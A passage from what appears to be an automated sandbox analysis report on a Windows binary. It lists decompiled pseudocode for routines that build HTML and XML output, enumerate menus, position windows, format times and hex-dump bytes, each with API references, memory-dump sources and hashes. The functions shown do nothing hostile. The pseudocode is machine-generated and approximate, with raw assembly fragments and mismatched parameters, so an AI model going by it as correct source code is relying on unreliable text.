						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t97 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
						E0040DBA9(_v28,  &_v108);
						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
						_t67 =  *(_t73 + 0x6c);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
							_pop(0);
						}
						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
						_push( *((intOrPtr*)(_t73 + 0x70)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x68)));
						L0040DFD6();
						_t101 = _t101 + 0x1c;
						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
						_t94 = _t94 + 1;
					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
				}
				return E00408857(_t73, 0, _a4, L"\r\n");
			}























                                                                                                                                                      0x00408afa
                                                                                                                                                      0x00408b07
                                                                                                                                                      0x00408b08
                                                                                                                                                      0x00408b15
                                                                                                                                                      0x00408b20
                                                                                                                                                      0x00408b20
                                                                                                                                                      0x00408b2c
                                                                                                                                                      0x00408b2e
                                                                                                                                                      0x00408b33
                                                                                                                                                      0x00408b38
                                                                                                                                                      0x00408b3e
                                                                                                                                                      0x00408b41
                                                                                                                                                      0x00408b47
                                                                                                                                                      0x00408b52
                                                                                                                                                      0x00408b58
                                                                                                                                                      0x00408b5a
                                                                                                                                                      0x00408b5a
                                                                                                                                                      0x00408b5d
                                                                                                                                                      0x00408b60
                                                                                                                                                      0x00408b64
                                                                                                                                                      0x00408b68
                                                                                                                                                      0x00408b6c
                                                                                                                                                      0x00408b76
                                                                                                                                                      0x00408b7f
                                                                                                                                                      0x00408b89
                                                                                                                                                      0x00408b9f
                                                                                                                                                      0x00408baf
                                                                                                                                                      0x00408bb2
                                                                                                                                                      0x00408bb5
                                                                                                                                                      0x00408bbb
                                                                                                                                                      0x00408bc9
                                                                                                                                                      0x00408bcf
                                                                                                                                                      0x00408bcf
                                                                                                                                                      0x00408bd9
                                                                                                                                                      0x00408bde
                                                                                                                                                      0x00408be4
                                                                                                                                                      0x00408be5
                                                                                                                                                      0x00408be8
                                                                                                                                                      0x00408bed
                                                                                                                                                      0x00408bf0
                                                                                                                                                      0x00408bf5
                                                                                                                                                      0x00408c00
                                                                                                                                                      0x00408c05
                                                                                                                                                      0x00408c06
                                                                                                                                                      0x00408b3e
                                                                                                                                                      0x00408c21

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                      • Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                      • Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
                                                                                                                                                      • Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
                                                                                                                                                      • Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406E97, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 42%
                                                                                                                                                      			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040E340(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E00406E97(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x412c34 =  *0x412c34 + 1;
							_t32 =  *0x412c34; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406E5E(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                                                      0x00406e97
                                                                                                                                                      0x00406e9a
                                                                                                                                                      0x00406ea2
                                                                                                                                                      0x00406ead
                                                                                                                                                      0x00406eb3
                                                                                                                                                      0x00406eb7
                                                                                                                                                      0x00406ebb
                                                                                                                                                      0x00406f81
                                                                                                                                                      0x00406f87
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406ec1
                                                                                                                                                      0x00406ec1
                                                                                                                                                      0x00406ecc
                                                                                                                                                      0x00406ed1
                                                                                                                                                      0x00406ed8
                                                                                                                                                      0x00406ee7
                                                                                                                                                      0x00406eef
                                                                                                                                                      0x00406ef7
                                                                                                                                                      0x00406eff
                                                                                                                                                      0x00406f03
                                                                                                                                                      0x00406f08
                                                                                                                                                      0x00406f10
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406f17
                                                                                                                                                      0x00406f62
                                                                                                                                                      0x00406f62
                                                                                                                                                      0x00406f66
                                                                                                                                                      0x00406f68
                                                                                                                                                      0x00406f69
                                                                                                                                                      0x00406f6d
                                                                                                                                                      0x00406f70
                                                                                                                                                      0x00406f75
                                                                                                                                                      0x00406f75
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406f66
                                                                                                                                                      0x00406f20
                                                                                                                                                      0x00406f29
                                                                                                                                                      0x00406f2b
                                                                                                                                                      0x00406f2b
                                                                                                                                                      0x00406f32
                                                                                                                                                      0x00406f36
                                                                                                                                                      0x00406f3b
                                                                                                                                                      0x00406f45
                                                                                                                                                      0x00406f4b
                                                                                                                                                      0x00406f50
                                                                                                                                                      0x00406f50
                                                                                                                                                      0x00406f3d
                                                                                                                                                      0x00406f3d
                                                                                                                                                      0x00406f3d
                                                                                                                                                      0x00406f3d
                                                                                                                                                      0x00406f3b
                                                                                                                                                      0x00406f5b
                                                                                                                                                      0x00406f61
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406f78
                                                                                                                                                      0x00406f78
                                                                                                                                                      0x00406f79
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                      • String ID: 0$6
                                                                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                                                                      • Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                      • Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
                                                                                                                                                      • Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
                                                                                                                                                      • Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004019D2, Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E004019D2(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t26;
				int _t30;
				void* _t33;
				int _t36;
				int _t37;
				int _t40;
				int _t49;

				_t33 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
					return _t26;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t40 = GetSystemMetrics(0x4c);
					_t30 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t40 = 0;
						_t30 = 0;
					} else {
						_v8 = _v8 + _t40;
						_v12 = _v12 + _t30;
					}
					_t49 = _v20 - _v28;
					if(_t49 > 0x14) {
						_t37 = _v24;
						_t36 = _v16 - _t37;
						if(_t36 > 0x14 && _v20 > _t40 + 5) {
							_t30 = _t30 + 0xfffffff6;
							if(_t37 >= _t30) {
								_t30 = _v28;
								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
								}
							}
						}
					}
					return _t30;
				}
			}
















                                                                                                                                                      0x004019d2
                                                                                                                                                      0x004019df
                                                                                                                                                      0x00401a94
                                                                                                                                                      0x004019e5
                                                                                                                                                      0x004019f0
                                                                                                                                                      0x004019f1
                                                                                                                                                      0x004019f2
                                                                                                                                                      0x004019f3
                                                                                                                                                      0x00401a00
                                                                                                                                                      0x00401a07
                                                                                                                                                      0x00401a0e
                                                                                                                                                      0x00401a10
                                                                                                                                                      0x00401a17
                                                                                                                                                      0x00401a2b
                                                                                                                                                      0x00401a30
                                                                                                                                                      0x00401a33
                                                                                                                                                      0x00401a35
                                                                                                                                                      0x00401a1e
                                                                                                                                                      0x00401a1e
                                                                                                                                                      0x00401a21
                                                                                                                                                      0x00401a21
                                                                                                                                                      0x00401a3a
                                                                                                                                                      0x00401a40
                                                                                                                                                      0x00401a45
                                                                                                                                                      0x00401a48
                                                                                                                                                      0x00401a4d
                                                                                                                                                      0x00401a57
                                                                                                                                                      0x00401a5c
                                                                                                                                                      0x00401a5e
                                                                                                                                                      0x00401a67
                                                                                                                                                      0x00401a8b
                                                                                                                                                      0x00401a8b
                                                                                                                                                      0x00401a67
                                                                                                                                                      0x00401a5c
                                                                                                                                                      0x00401a4d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401a92

                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 004019FC
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A03
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A0A
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A10
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A27
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 00401A2E
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MetricsSystem$Window
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1155976603-0
                                                                                                                                                      • Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                      • Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
                                                                                                                                                      • Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
                                                                                                                                                      • Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405C17, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405C17(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v24;
				long _v280;
				long _v536;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
						wcscpy(_a4,  &_v280);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v536);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40f454);
				}
				return _a4;
			}







                                                                                                                                                      0x00405c17
                                                                                                                                                      0x00405c28
                                                                                                                                                      0x00405c3b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405c45
                                                                                                                                                      0x00405c5f
                                                                                                                                                      0x00405c74
                                                                                                                                                      0x00405c84
                                                                                                                                                      0x00405c91
                                                                                                                                                      0x00405ca0
                                                                                                                                                      0x00405ca5
                                                                                                                                                      0x00405caa
                                                                                                                                                      0x00405caa
                                                                                                                                                      0x00405cb2
                                                                                                                                                      0x00405cb8
                                                                                                                                                      0x00405cc0

                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
                                                                                                                                                      • wcscpy.MSVCRT ref: 00405C84
                                                                                                                                                      • wcscat.MSVCRT ref: 00405C91
                                                                                                                                                      • wcscat.MSVCRT ref: 00405CA0
                                                                                                                                                      • wcscpy.MSVCRT ref: 00405CB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1331804452-0
                                                                                                                                                      • Opcode ID: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
                                                                                                                                                      • Instruction ID: cbd8c252d2d2ef195a4c0e5b8e64ca40110f1bd057fda192b525793d095b5ed7
                                                                                                                                                      • Opcode Fuzzy Hash: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
                                                                                                                                                      • Instruction Fuzzy Hash: 57116072900209AFEB20AB90DD45EEF776CEB04314F104076FA05B6091E675AE49CAB9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405D33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040DFD6();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                                                      0x00405d33
                                                                                                                                                      0x00405d3c
                                                                                                                                                      0x00405d53
                                                                                                                                                      0x00405d58
                                                                                                                                                      0x00405d5c
                                                                                                                                                      0x00405d5f
                                                                                                                                                      0x00405d61
                                                                                                                                                      0x00405d68
                                                                                                                                                      0x00405d69
                                                                                                                                                      0x00405d74
                                                                                                                                                      0x00405d79
                                                                                                                                                      0x00405d7a
                                                                                                                                                      0x00405d7f
                                                                                                                                                      0x00405d84
                                                                                                                                                      0x00405d8c
                                                                                                                                                      0x00405d92
                                                                                                                                                      0x00405d97
                                                                                                                                                      0x00405d9b
                                                                                                                                                      0x00405da1
                                                                                                                                                      0x00405da9
                                                                                                                                                      0x00405daf
                                                                                                                                                      0x00405da1
                                                                                                                                                      0x00405db8
                                                                                                                                                      0x00405dbd
                                                                                                                                                      0x00405dc5
                                                                                                                                                      0x00405dcc

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                      • API String ID: 2521778956-791839006
                                                                                                                                                      • Opcode ID: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                      • Instruction ID: cee391cc34d681d13bec3c3f8d39c8b6c523e2a4e61045ff621ae80f21b9d711
                                                                                                                                                      • Opcode Fuzzy Hash: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                      • Instruction Fuzzy Hash: 86012873E403196AE73067519C4ABBB33A8EF44714F10807BFC15F51C2EB7C99498A88
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004093B3, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                                      			E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t27 = __ecx;
				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00408857(_t16, _t27);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E004086F5(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t29, _t29, _a4,  &_v1028);
			}












                                                                                                                                                      0x004093b3
                                                                                                                                                      0x004093cf
                                                                                                                                                      0x004093d1
                                                                                                                                                      0x004093d8
                                                                                                                                                      0x004093e6
                                                                                                                                                      0x004093ed
                                                                                                                                                      0x004093f8
                                                                                                                                                      0x004093fa
                                                                                                                                                      0x00409403
                                                                                                                                                      0x004093fc
                                                                                                                                                      0x004093fc
                                                                                                                                                      0x004093fc
                                                                                                                                                      0x0040940b
                                                                                                                                                      0x00409414
                                                                                                                                                      0x00409418
                                                                                                                                                      0x0040941e
                                                                                                                                                      0x00409425
                                                                                                                                                      0x00409426
                                                                                                                                                      0x00409431
                                                                                                                                                      0x00409436
                                                                                                                                                      0x00409437
                                                                                                                                                      0x00409454

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403
                                                                                                                                                      • <%s>, xrefs: 00409426
                                                                                                                                                      • <?xml version="1.0" ?>, xrefs: 004093FC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                                                                      • Opcode ID: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                      • Instruction ID: 5b2b9264402656275e8c2dd0f1d17c7e9a998e95cf6bd8efe94fc2853a0f1184
                                                                                                                                                      • Opcode Fuzzy Hash: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                      • Instruction Fuzzy Hash: 57019BB2A001197AD720BA59CD41EAA766CEF44348F0040BBB60DF3192DB789E4586A9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DDA7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E004055FF(0xff,  &_v1036, _v8);
				E004056C9(_t34, __esi);
				return 1;
			}








                                                                                                                                                      0x0040ddbc
                                                                                                                                                      0x0040ddcb
                                                                                                                                                      0x0040dddc
                                                                                                                                                      0x0040ddeb
                                                                                                                                                      0x0040de0c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040de30
                                                                                                                                                      0x0040de17
                                                                                                                                                      0x0040de1d
                                                                                                                                                      0x0040de25
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DDBC
                                                                                                                                                      • wcscat.MSVCRT ref: 0040DDCB
                                                                                                                                                      • wcscat.MSVCRT ref: 0040DDDC
                                                                                                                                                      • wcscat.MSVCRT ref: 0040DDEB
                                                                                                                                                      • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05
                                                                                                                                                        • Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
                                                                                                                                                        • Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C
                                                                                                                                                        • Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
                                                                                                                                                        • Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                      • API String ID: 393120378-2245444037
                                                                                                                                                      • Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                      • Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
                                                                                                                                                      • Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
                                                                                                                                                      • Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406CC6, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                      • API String ID: 999028693-502967061
                                                                                                                                                      • Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
